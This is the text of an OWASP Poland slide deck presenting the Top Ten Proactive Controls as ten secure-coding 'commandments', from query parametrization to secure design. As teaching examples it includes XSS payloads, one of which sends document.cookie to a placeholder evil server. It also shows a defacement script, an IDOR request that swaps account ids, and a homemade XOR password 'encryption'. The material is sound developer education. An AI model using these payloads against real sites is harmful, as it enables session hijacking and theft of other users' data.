ten commandments of secure coding

Ten Commandments of Secure Coding OWASP Top Ten Proactive Controls Mateusz Olejarka OWASP Poland

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Ten Commandments of Secure CodingOWASP Top Ten Proactive Controls

Mateusz OlejarkaOWASP Poland

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Mateusz Olejarka @molejarka

• Senior IT Security Consultant @SecuRing

• Ex-developer• OWASP Poland since 2011

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• Docs & tools– free– Creative Commons license– open source

• Build with open collaboration in mind– Each one of you can join


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OWASP Poland Chapter

• Since 2007• Meetings: Kraków, Poznań, Warszawa• Free entry• Supporters:

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4Developers 2014* questionnaire* SecuRing’s study „Praktyki wytwarzania bezpiecznego oprogramowania w polskich firmach – 2014”• 62% companies do not educate programmers on

application security• >50% companies do not consider security during the

design stage• 73% participants confirmed, that they fixed security

related issues• only 42% confirmed, that they do security testing

before production deployment

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• Do not rely your application security on Top 10 *– It is purely educational material– Each application has its own risk profile

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Thou shalt parametrize queries

1: Parametrize queries

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Easily exploitable• Simple to use tools existDevastating impact#1

Źródło: http://xkcd.com/327/

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Best practices

#1 Prepared Statements / Parametrized Queries

#2 Stored Procedures– Watch for exeptions! (eval,dynamic block, etc.)

#3 Escaping– risky!

String newName = request.getParameter("newName");String id = request.getParameter("id");PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); pstmt.setString(1, newName); pstmt.setString(2, id);

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2: Thou shalt encode data

2: Encode Data

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• Site defacement

• Session hijacking

<script>document.body.innerHTML(“Jim was here”);</script>

<script>var img = new Image();img.src="http://<some evil server>.com?” + document.cookie;</script>

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Results of missing encoding

• Session hijacking• Network scanning• CSRF prevention bypass• Site defacement (browser)• …• Browser hijack

– vide BeEF

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Cross Site Scripting

But when we write output inside pure JavaScript:

<script> var split='<bean:write name="transferFormId" property="trn_recipient">'; splitRecipient(split); </script>


<script> var split='';alert('xss');--

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Best practices

• Special character encoding has to be context aware– HTML element – HTML attribute– JavaScript– JSON– CSS / style– URL

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Thou shalt validate all inputs

3: Validate All Inputs

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Why validate anything?

• Most of other vulnerabilities (np. injections, xss, …) occurs (also) from missing input validation

• Validation it is like firewall– Do not protects you agains everything– …but nice to have

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Best practices

• Prefer whitelist over blacklist approach,• Use strongly typed fields

– One validator per one data type– Easier to integrate a WAF

• Validation = first line of defence– For exaple type casting prevents injection– But not the only one!

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Thou shalt implement appropriate access controls

4: Implement Appropriate Access Controls

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Account history

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HTTP requestGET /services/history/account/85101022350445200448009906 HTTP/1.1 SA-DeviceId: 940109f08ba56a89 SA-SessionId: 826175 Accept: application/json Host: accConnection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

GET /services/history/account/45101022350445200448005388 HTTP/1.1

SA-DeviceId: 940109f08ba56a89

SA-SessionId: 826175

Accept: application/json

Host: acc

Connection: Keep-Alive

User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Account id change – we get other user data

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Best practices

• Server makes a final call!• Default deny• All request must go through access controll

– centralized, easy to use mechanism• Access control rules (policy) should be

separated from code– Not a part of it

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if (currentUser.hasRole(“administrator”)) { //pozwol} else { //zabron}

If (currentUser.isPermitted(printPermission)) { //pozwol} else { //zabron}

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Thou shalt establish identity and authentication controls

5: Establish Identity and Authentication Controls

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Example vulnerability

• Authentication with locally stored key (on the machine)

• Process:1. Enter login2. Select key file,enter key password3. We are logged in


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Best practices

• Check access control for the functions allowing to change authentication credentials

• „chain of trust” rule• Watch for session at the border!• Do not limit length and characters to use in


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Thou shalt protect data and privacy6: Protect Data and Privacy

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Example (at transit)

• SSL covers encryption and authentication• What verifies servers identity?

– Web applications: Browser– Mobile / thick-client / embedded… application:

Application• Common errors

– Missing certificate validation– Brak sprawdzenia certyfikatu lub „łańcucha zaufania”– Missing exception handling

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Best practices (in transit)

• TLS• For whole application• Cookies: „Secure” flag • HTTP Strict Transport Security• Strong cipher suites• Chain of trust• Certificate pinning

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Example (at rest)

• Storing password• „Own” SHA1 function

public static String encrypt(byte [] in){

String out = "";for(int i = 0; i < in.length; i++){

byte b = (byte)(in[i] ^ key[i%key.length]);out += "" + hexDigit[(b & 0xf0)>>4] + hexDigit[b

& 0x0f];} return out;


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Best practices(at rest)

• Do not reinwent the wheel!– Home-bred ciphers are evil– Own crypto is evil– Only libraries with reputation!

• Strong ciphers in strong modes– ECB is evil– CBC – watch for „padding oracle”

• Good RNG for IV

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Thou shalt implement logging, error handling and intrusion detection

7: Implement Logging, Error Handling and Intrusion Detection

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Thou shalt leverage security features of frameworks and security libraries

8: Leverage Security Features of Frameworks and Security Libraries

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Thou shalt include security-specific requirements

9: Include Security-Specific Requirements

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Building requirements

• Attack scenatios– How threats can reach the objectives?– Requires experience and expertise

• Selection of security controls == REQUIREMENTS

Threat ResultsAttack


Who? How? What?

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Thou shalt design and architect security in

10: Design and Architect Security In

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That was just the Top Ten!

• Each application is different– Risk profile should be defined (WHO? WHY?) – Consider „compliance with existing regulations”

• Few easy steps with big positive impact• Developers education is worth it!

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OWASP meetings

• https://www.owasp.org/index.php/Poland • Mailing list• Facebook: OWASP Poland Local Chapter• Twitter: @owasppoland

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Thank you!

Mateusz [email protected]@owasp.org